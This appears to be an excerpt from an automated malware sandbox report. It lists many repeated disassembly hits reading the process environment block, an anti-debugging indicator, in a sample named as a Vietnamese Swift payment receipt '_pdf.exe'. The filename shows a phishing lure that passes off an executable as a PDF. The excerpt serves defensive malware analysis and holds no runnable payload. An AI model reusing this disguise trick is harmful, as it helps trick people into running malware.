Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012660E0 mov eax, dword ptr fs:[00000030h]	4_2_012660E0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012220F0 mov ecx, dword ptr fs:[00000030h]	4_2_012220F0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011DC0F0 mov eax, dword ptr fs:[00000030h]	4_2_011DC0F0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011E80E9 mov eax, dword ptr fs:[00000030h]	4_2_011E80E9
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012620DE mov eax, dword ptr fs:[00000030h]	4_2_012620DE
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011DA0E3 mov ecx, dword ptr fs:[00000030h]	4_2_011DA0E3
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011DC310 mov ecx, dword ptr fs:[00000030h]	4_2_011DC310
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012B8324 mov eax, dword ptr fs:[00000030h]	4_2_012B8324
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012B8324 mov ecx, dword ptr fs:[00000030h]	4_2_012B8324
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012B8324 mov eax, dword ptr fs:[00000030h]	4_2_012B8324
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012B8324 mov eax, dword ptr fs:[00000030h]	4_2_012B8324
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0121A30B mov eax, dword ptr fs:[00000030h]	4_2_0121A30B
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0121A30B mov eax, dword ptr fs:[00000030h]	4_2_0121A30B
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0121A30B mov eax, dword ptr fs:[00000030h]	4_2_0121A30B
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01200310 mov ecx, dword ptr fs:[00000030h]	4_2_01200310
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0128437C mov eax, dword ptr fs:[00000030h]	4_2_0128437C
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012B634F mov eax, dword ptr fs:[00000030h]	4_2_012B634F
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01262349 mov eax, dword ptr fs:[00000030h]	4_2_01262349
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01262349 mov eax, dword ptr fs:[00000030h]	4_2_01262349
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01262349 mov eax, dword ptr fs:[00000030h]	4_2_01262349
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01262349 mov eax, dword ptr fs:[00000030h]	4_2_01262349
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01262349 mov eax, dword ptr fs:[00000030h]	4_2_01262349
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01262349 mov eax, dword ptr fs:[00000030h]	4_2_01262349
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01262349 mov eax, dword ptr fs:[00000030h]	4_2_01262349
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01262349 mov eax, dword ptr fs:[00000030h]	4_2_01262349
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01262349 mov eax, dword ptr fs:[00000030h]	4_2_01262349
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01262349 mov eax, dword ptr fs:[00000030h]	4_2_01262349
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01262349 mov eax, dword ptr fs:[00000030h]	4_2_01262349
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01262349 mov eax, dword ptr fs:[00000030h]	4_2_01262349
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01262349 mov eax, dword ptr fs:[00000030h]	4_2_01262349
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01262349 mov eax, dword ptr fs:[00000030h]	4_2_01262349
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01262349 mov eax, dword ptr fs:[00000030h]	4_2_01262349
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012AA352 mov eax, dword ptr fs:[00000030h]	4_2_012AA352
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01288350 mov ecx, dword ptr fs:[00000030h]	4_2_01288350
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0126035C mov eax, dword ptr fs:[00000030h]	4_2_0126035C
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0126035C mov eax, dword ptr fs:[00000030h]	4_2_0126035C
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0126035C mov eax, dword ptr fs:[00000030h]	4_2_0126035C
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0126035C mov ecx, dword ptr fs:[00000030h]	4_2_0126035C
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0126035C mov eax, dword ptr fs:[00000030h]	4_2_0126035C
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0126035C mov eax, dword ptr fs:[00000030h]	4_2_0126035C
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011D8397 mov eax, dword ptr fs:[00000030h]	4_2_011D8397
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011D8397 mov eax, dword ptr fs:[00000030h]	4_2_011D8397
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011D8397 mov eax, dword ptr fs:[00000030h]	4_2_011D8397
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011DE388 mov eax, dword ptr fs:[00000030h]	4_2_011DE388
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011DE388 mov eax, dword ptr fs:[00000030h]	4_2_011DE388
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011DE388 mov eax, dword ptr fs:[00000030h]	4_2_011DE388
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0120438F mov eax, dword ptr fs:[00000030h]	4_2_0120438F
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0120438F mov eax, dword ptr fs:[00000030h]	4_2_0120438F
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011E83C0 mov eax, dword ptr fs:[00000030h]	4_2_011E83C0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011E83C0 mov eax, dword ptr fs:[00000030h]	4_2_011E83C0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011E83C0 mov eax, dword ptr fs:[00000030h]	4_2_011E83C0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011E83C0 mov eax, dword ptr fs:[00000030h]	4_2_011E83C0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011EA3C0 mov eax, dword ptr fs:[00000030h]	4_2_011EA3C0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011EA3C0 mov eax, dword ptr fs:[00000030h]	4_2_011EA3C0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011EA3C0 mov eax, dword ptr fs:[00000030h]	4_2_011EA3C0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011EA3C0 mov eax, dword ptr fs:[00000030h]	4_2_011EA3C0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011EA3C0 mov eax, dword ptr fs:[00000030h]	4_2_011EA3C0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011EA3C0 mov eax, dword ptr fs:[00000030h]	4_2_011EA3C0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012163FF mov eax, dword ptr fs:[00000030h]	4_2_012163FF
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0129C3CD mov eax, dword ptr fs:[00000030h]	4_2_0129C3CD
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012663C0 mov eax, dword ptr fs:[00000030h]	4_2_012663C0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011FE3F0 mov eax, dword ptr fs:[00000030h]	4_2_011FE3F0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011FE3F0 mov eax, dword ptr fs:[00000030h]	4_2_011FE3F0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011FE3F0 mov eax, dword ptr fs:[00000030h]	4_2_011FE3F0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0128E3DB mov eax, dword ptr fs:[00000030h]	4_2_0128E3DB
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0128E3DB mov eax, dword ptr fs:[00000030h]	4_2_0128E3DB
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0128E3DB mov ecx, dword ptr fs:[00000030h]	4_2_0128E3DB
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0128E3DB mov eax, dword ptr fs:[00000030h]	4_2_0128E3DB
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011F03E9 mov eax, dword ptr fs:[00000030h]	4_2_011F03E9
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011F03E9 mov eax, dword ptr fs:[00000030h]	4_2_011F03E9
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011F03E9 mov eax, dword ptr fs:[00000030h]	4_2_011F03E9
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011F03E9 mov eax, dword ptr fs:[00000030h]	4_2_011F03E9
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011F03E9 mov eax, dword ptr fs:[00000030h]	4_2_011F03E9
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011F03E9 mov eax, dword ptr fs:[00000030h]	4_2_011F03E9
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011F03E9 mov eax, dword ptr fs:[00000030h]	4_2_011F03E9
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011F03E9 mov eax, dword ptr fs:[00000030h]	4_2_011F03E9
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012843D4 mov eax, dword ptr fs:[00000030h]	4_2_012843D4
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012843D4 mov eax, dword ptr fs:[00000030h]	4_2_012843D4
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011D823B mov eax, dword ptr fs:[00000030h]	4_2_011D823B
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011E6259 mov eax, dword ptr fs:[00000030h]	4_2_011E6259
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011DA250 mov eax, dword ptr fs:[00000030h]	4_2_011DA250
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01290274 mov eax, dword ptr fs:[00000030h]	4_2_01290274
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01290274 mov eax, dword ptr fs:[00000030h]	4_2_01290274
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01290274 mov eax, dword ptr fs:[00000030h]	4_2_01290274
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01290274 mov eax, dword ptr fs:[00000030h]	4_2_01290274
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01290274 mov eax, dword ptr fs:[00000030h]	4_2_01290274
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01290274 mov eax, dword ptr fs:[00000030h]	4_2_01290274
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01290274 mov eax, dword ptr fs:[00000030h]	4_2_01290274
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01290274 mov eax, dword ptr fs:[00000030h]	4_2_01290274
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01290274 mov eax, dword ptr fs:[00000030h]	4_2_01290274
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01290274 mov eax, dword ptr fs:[00000030h]	4_2_01290274
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01290274 mov eax, dword ptr fs:[00000030h]	4_2_01290274
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01290274 mov eax, dword ptr fs:[00000030h]	4_2_01290274
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01268243 mov eax, dword ptr fs:[00000030h]	4_2_01268243
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01268243 mov ecx, dword ptr fs:[00000030h]	4_2_01268243
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011D826B mov eax, dword ptr fs:[00000030h]	4_2_011D826B
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012B625D mov eax, dword ptr fs:[00000030h]	4_2_012B625D
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0129A250 mov eax, dword ptr fs:[00000030h]	4_2_0129A250
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0129A250 mov eax, dword ptr fs:[00000030h]	4_2_0129A250
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011E4260 mov eax, dword ptr fs:[00000030h]	4_2_011E4260
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011E4260 mov eax, dword ptr fs:[00000030h]	4_2_011E4260
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011E4260 mov eax, dword ptr fs:[00000030h]	4_2_011E4260
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012762A0 mov eax, dword ptr fs:[00000030h]	4_2_012762A0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012762A0 mov ecx, dword ptr fs:[00000030h]	4_2_012762A0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012762A0 mov eax, dword ptr fs:[00000030h]	4_2_012762A0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012762A0 mov eax, dword ptr fs:[00000030h]	4_2_012762A0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012762A0 mov eax, dword ptr fs:[00000030h]	4_2_012762A0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012762A0 mov eax, dword ptr fs:[00000030h]	4_2_012762A0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01260283 mov eax, dword ptr fs:[00000030h]	4_2_01260283
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01260283 mov eax, dword ptr fs:[00000030h]	4_2_01260283
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01260283 mov eax, dword ptr fs:[00000030h]	4_2_01260283
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0121E284 mov eax, dword ptr fs:[00000030h]	4_2_0121E284
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0121E284 mov eax, dword ptr fs:[00000030h]	4_2_0121E284
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011EA2C3 mov eax, dword ptr fs:[00000030h]	4_2_011EA2C3
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011EA2C3 mov eax, dword ptr fs:[00000030h]	4_2_011EA2C3
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011EA2C3 mov eax, dword ptr fs:[00000030h]	4_2_011EA2C3
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011EA2C3 mov eax, dword ptr fs:[00000030h]	4_2_011EA2C3
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011EA2C3 mov eax, dword ptr fs:[00000030h]	4_2_011EA2C3
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012B62D6 mov eax, dword ptr fs:[00000030h]	4_2_012B62D6
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011F02E1 mov eax, dword ptr fs:[00000030h]	4_2_011F02E1
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011F02E1 mov eax, dword ptr fs:[00000030h]	4_2_011F02E1
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011F02E1 mov eax, dword ptr fs:[00000030h]	4_2_011F02E1
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0120E53E mov eax, dword ptr fs:[00000030h]	4_2_0120E53E
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0120E53E mov eax, dword ptr fs:[00000030h]	4_2_0120E53E
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0120E53E mov eax, dword ptr fs:[00000030h]	4_2_0120E53E
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0120E53E mov eax, dword ptr fs:[00000030h]	4_2_0120E53E
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0120E53E mov eax, dword ptr fs:[00000030h]	4_2_0120E53E
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01276500 mov eax, dword ptr fs:[00000030h]	4_2_01276500
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011F0535 mov eax, dword ptr fs:[00000030h]	4_2_011F0535
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011F0535 mov eax, dword ptr fs:[00000030h]	4_2_011F0535
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011F0535 mov eax, dword ptr fs:[00000030h]	4_2_011F0535
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011F0535 mov eax, dword ptr fs:[00000030h]	4_2_011F0535
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011F0535 mov eax, dword ptr fs:[00000030h]	4_2_011F0535
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011F0535 mov eax, dword ptr fs:[00000030h]	4_2_011F0535
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012B4500 mov eax, dword ptr fs:[00000030h]	4_2_012B4500
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012B4500 mov eax, dword ptr fs:[00000030h]	4_2_012B4500
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012B4500 mov eax, dword ptr fs:[00000030h]	4_2_012B4500
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012B4500 mov eax, dword ptr fs:[00000030h]	4_2_012B4500
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012B4500 mov eax, dword ptr fs:[00000030h]	4_2_012B4500
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012B4500 mov eax, dword ptr fs:[00000030h]	4_2_012B4500
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012B4500 mov eax, dword ptr fs:[00000030h]	4_2_012B4500
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0121656A mov eax, dword ptr fs:[00000030h]	4_2_0121656A
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0121656A mov eax, dword ptr fs:[00000030h]	4_2_0121656A
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0121656A mov eax, dword ptr fs:[00000030h]	4_2_0121656A
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011E8550 mov eax, dword ptr fs:[00000030h]	4_2_011E8550
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011E8550 mov eax, dword ptr fs:[00000030h]	4_2_011E8550
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012605A7 mov eax, dword ptr fs:[00000030h]	4_2_012605A7
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012605A7 mov eax, dword ptr fs:[00000030h]	4_2_012605A7
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012605A7 mov eax, dword ptr fs:[00000030h]	4_2_012605A7
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012045B1 mov eax, dword ptr fs:[00000030h]	4_2_012045B1
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012045B1 mov eax, dword ptr fs:[00000030h]	4_2_012045B1
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011E2582 mov eax, dword ptr fs:[00000030h]	4_2_011E2582
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011E2582 mov ecx, dword ptr fs:[00000030h]	4_2_011E2582
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01214588 mov eax, dword ptr fs:[00000030h]	4_2_01214588
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0121E59C mov eax, dword ptr fs:[00000030h]	4_2_0121E59C
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0120E5E7 mov eax, dword ptr fs:[00000030h]	4_2_0120E5E7
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0120E5E7 mov eax, dword ptr fs:[00000030h]	4_2_0120E5E7
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0120E5E7 mov eax, dword ptr fs:[00000030h]	4_2_0120E5E7
